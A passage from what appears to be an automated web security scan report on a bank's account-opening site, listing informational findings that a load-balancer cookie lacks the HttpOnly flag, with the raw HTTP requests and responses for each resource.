Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/FormHandler.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/FormHandler.js HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: secureapps.regions.com-ssl=R54947255; ASP.NET_SessionId=x2zf2a45rab0i245f4jzczva

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 86459
Content-Type: application/x-javascript
Last-Modified: Wed, 20 Apr 2011 18:24:56 GMT
Accept-Ranges: bytes
ETag: "04cba3f88ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:18:56 GMT

...// JScript File
var IE = (document.all) ? 1 : 0; var NN4 = (document.layers) ? 1 : 0; var DOM = (document.getElementById && !document.all) ? 1 : 0; var NS7 = (document.getElementById) ? 1 : 0; var
...[SNIP]...
8.34. https://secureapps.regions.com/oao/Images/confirmation.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/Images/confirmation.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/Images/confirmation.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45; secureapps.regions.com-ssl=R54947255

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 2319
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:06 GMT

GIF89a........t....nnn............VVV....U.DDD....................X.............`...............D.....w......!.......,............'.di.h..l..p,....B.!w.6.m0.*4.A...9...t:.....Q.4*.^.H .R...:v8~
m..g.
...[SNIP]...
8.35. https://secureapps.regions.com/oao/Images/funding.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/Images/funding.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/Images/funding.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45; secureapps.regions.com-ssl=R54947255

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 3849
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:18 GMT

GIF89a.......DDD.....................sssfff.......U.....l".....D.......`...f.......w3.....w..U...............!.......,............'.di.h..l..p,..`#.....|...`..
#..G.9......&.;./($...QB....h.9..E....1
...[SNIP]...
8.36. https://secureapps.regions.com/oao/Images/gettingstarted.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/Images/gettingstarted.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/Images/gettingstarted.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45; secureapps.regions.com-ssl=R54947255

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 2300
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:07 GMT

GIF89a................ppp......VVV.......U.DDD........Y.w3...yyy....`...............D....l"...iii......fff...!.......,............'.di.h..l..p,..bC.w...}..M .*.#....9........;./($....F....h........oT.
...[SNIP]...
8.37. https://secureapps.regions.com/oao/Images/helpIcon.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/Images/helpIcon.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/Images/helpIcon.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45; secureapps.regions.com-ssl=R54947255

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 326
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:15 GMT

GIF89a......l."w.3.....w`..Y..]....K.....u[.    .....Q..N..................W..}.<........{a................`..f.?..T...............k.!..x..._........U...................................................
...[SNIP]...
8.38. https://secureapps.regions.com/oao/Images/loading7.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/Images/loading7.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/Images/loading7.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45; secureapps.regions.com-ssl=R54947255

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 2246
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:15 GMT

GIF89aQ....?...............w.....H..h..r........X........*....................5..+.....i..X..;..K..............s..l.....<..L.................).....Y........f.....@.....8..H.....y...........I........W.
...[SNIP]...
8.39. https://secureapps.regions.com/oao/Images/yourinformation.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/Images/yourinformation.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/Images/yourinformation.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45; secureapps.regions.com-ssl=R54947255

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 4021
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:06 GMT

GIF89a............................sss...VVV.......l".....DDDD..f....w3........U.`......w..........U.fff......!.......,............'.di.h..l..p,..c......}..m0.>......9......&.;./($...QGx...hs..    ....oT.
...[SNIP]...
8.40. https://secureapps.regions.com/oao/Scripts/jquery.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/Scripts/jquery.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/Scripts/jquery.js HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: secureapps.regions.com-ssl=R54947255; ASP.NET_SessionId=x2zf2a45rab0i245f4jzczva

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 29856
Content-Type: application/x-javascript
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:18:55 GMT

/*
* jQuery 1.2.3 - New Wave Javascript
*
* Copyright (c) 2008 John Resig (jquery.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* $Date: 20
...[SNIP]...
8.41. https://secureapps.regions.com/oao/Scripts/thickbox.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/Scripts/thickbox.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/Scripts/thickbox.js HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: secureapps.regions.com-ssl=R54947255; ASP.NET_SessionId=x2zf2a45rab0i245f4jzczva

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 17069
Content-Type: application/x-javascript
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:18:55 GMT

/*
* Thickbox 3.1 - One Box To Rule Them All.
* By Cody Lindley (http://www.codylindley.com)
* Copyright (c) 2007 cody lindley
* Licensed under the MIT License: http://www.opensource.org/licen
...[SNIP]...
8.42. https://secureapps.regions.com/oao/app01.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/app01.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/app01.aspx?type=prefplus HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Date: Mon, 16 May 2011 15:18:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45; domain=secureapps.regions.com; path=/; secure; HttpOnly
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 48498


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Cont
...[SNIP]...
8.43. https://secureapps.regions.com/oao/app02.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/app02.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/app02.aspx?type=savings HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=savings
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=maulyk45yit1a2rvnyvjro3i; WT_FPC=id=2ac1f5713c1606c63d81305555542668:lv=1305555570806:ss=1305555542668; secureapps.regions.com-ssl=R54983192

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54983192; path=/
Cache-Control: no-cache, no-store
Date: Mon, 16 May 2011 15:20:42 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 76388


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Cont
...[SNIP]...
8.44. https://secureapps.regions.com/oao/images/arrowOrange.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/images/arrowOrange.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/images/arrowOrange.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=prefplus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=pyqokfmici4cwr45lj5pm1is; secureapps.regions.com-ssl=R54947255; WT_FPC=id=2ac1f5713c1606c63d81305555542668:lv=1305555551873:ss=1305555542668

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 60
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:15 GMT

GIF89a..    .....f..........!.......,......    ........-..49v.).;
8.45. https://secureapps.regions.com/oao/images/bgDot.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/images/bgDot.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/images/bgDot.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=prefplus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=pyqokfmici4cwr45lj5pm1is; secureapps.regions.com-ssl=R54947255; WT_FPC=id=2ac1f5713c1606c63d81305555542668:lv=1305555551873:ss=1305555542668

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 46
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:15 GMT

GIF89a.............!.......,.................;
8.46. https://secureapps.regions.com/oao/images/continue.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/images/continue.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/images/continue.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=pyqokfmici4cwr45lj5pm1is; secureapps.regions.com-ssl=R54947255; WT_FPC=id=2ac1f5713c1606c63d81305555542668:lv=1305555542668:ss=1305555542668

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 407
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:23 GMT

GIF89aG...............]..`....V.....wl."..f.....D......w.3......[.    d....i..T.....A..N.....rq.*.........U.....!.......,....G........e.g.h..l....}...x...7..`.....-.+a.t.. a2...".........=B..o..p>L    ....
...[SNIP]...
8.47. https://secureapps.regions.com/oao/images/ehl_logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/images/ehl_logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/images/ehl_logo.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=prefplus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=pyqokfmici4cwr45lj5pm1is; secureapps.regions.com-ssl=R54947255; WT_FPC=id=2ac1f5713c1606c63d81305555542668:lv=1305555551873:ss=1305555542668

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 595
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:15 GMT

GIF89a.........[[[...\\\MMM......ttt......```hhhmmm]]]...WWW___......KKK|||......jjj...{{{~~~.........VVV...............XXXlllRRR...xxxQQQ............yyy..................vvvbbb......iii.............
...[SNIP]...
8.48. https://secureapps.regions.com/oao/images/error.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/images/error.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/images/error.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45; secureapps.regions.com-ssl=R54947255

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 299
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:23 GMT

GIF89a..........,........}y....`[....E<....... ..............ro.SM.......'..................................!.......,.......... ...40U:)."8.. .UgVve:$~.
...d8.N`.Q...%..h0....    ...O...\...........s%
...[SNIP]...
8.49. https://secureapps.regions.com/oao/images/homepage.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/images/homepage.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/images/homepage.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/ErrorPage.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wm55et55z1a3uoz33gj0wayn; WT_FPC=id=2ac1f5713c1606c63d81305555542668:lv=1305555620131:ss=1305555542668; secureapps.regions.com-ssl=R54983192

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54983192; path=/
Content-Length: 632
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:20:42 GMT

GIF89a.........U`........]....D..w..............f......w.3...[.    d....T........B..N....?.........l."...U.....!.......,...............g.h..l..p,.ht}...|..@........k.Q:.P..u.X;.....&..S..-7W...Q..M..<..
...[SNIP]...
8.50. https://secureapps.regions.com/oao/images/icon_secure.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/images/icon_secure.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/images/icon_secure.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45; secureapps.regions.com-ssl=R54947255

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 77
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:18 GMT

GIF89a    .............i....!.......,....    .........1-;.....n..#.4b.F"x.........;
8.51. https://secureapps.regions.com/oao/images/loadingAnimation.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/images/loadingAnimation.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/images/loadingAnimation.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=pyqokfmici4cwr45lj5pm1is; WT_FPC=id=2ac1f5713c1606c63d81305555542668:lv=1305555542668:ss=1305555542668; secureapps.regions.com-ssl=R54947255

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 5886
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:17 GMT

GIF89a......................................................................................................!..NETSCAPE2.0.....!...
...,.......... .@Ri.h..l..p,.tm..#6N......+.r..rD4...h..@F.Cj.z]L.
...[SNIP]...
8.52. https://secureapps.regions.com/oao/scripts/wtbase.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/scripts/wtbase.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/scripts/wtbase.js HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
